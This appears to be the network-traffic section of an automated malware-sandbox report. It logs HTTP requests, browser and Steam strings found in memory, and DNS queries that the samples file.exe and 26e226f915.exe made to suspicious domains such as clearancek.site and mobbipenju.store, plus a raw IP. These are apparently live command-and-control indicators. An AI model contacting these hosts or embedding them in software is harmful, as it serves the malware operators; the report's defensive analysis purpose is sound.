Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://cdn.branch.io/branch-latest.min.js**://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat_video.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://c.amazon-adsystem.com/aax2/apstag.js*://auth.9c9media.ca/auth/main.js*://track.adform.net/serving/scripts/trackpoint/*://*.imgur.io/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/all.js**://www.google-analytics.com/analytics.js**://static.chartbeat.com/js/chartbeat.js*://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://id.rambler.ru/rambler-id-helper/auth_events.jsdisabled_picture_in_picture_overrides.dailymotiondisabled_picture_in_picture_overrides.washingtonpost*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js*://www.googleadservices.com/pagead/conversion_async.js equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.0000017085290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/firefoxview-tabpickup-password-locked-primarybutton equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3308589953.0000017084AD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: file.exe, 00000000.00000003.2134302834.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=14a069e6677fb5a07d6a2b8f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 16:09:17 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=cfac046760478cb378cd12f6; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35741Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 16:08:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/passwordmgr-storage-replace did not match due to targeting_generateVariablesOnlySchemaupdateSessionStoreForStorageSSF_updateSessionStoreForStorage equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/passwordmgr-storage-replace did not match due to targeting_generateVariablesOnlySchemaupdateSessionStoreForStorageSSF_updateSessionStoreForStoragensIFinalizationWitnessService equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ine' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: owered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://ww equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://nimbus/ExperimentAPI.sys.mjsresource:///modules/AboutNewTab.sys.mjsresource:///modules/CustomizableUI.sys.mjsresource://gre/modules/TelemetrySession.sys.mjsbrowser.migrate.interactions.bookmarksbrowser.migrate.interactions.csvpasswordsFXA_ATTACHED_CLIENTS_UPDATE_INTERVAL*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.stea> equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3308589953.0000017084AD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
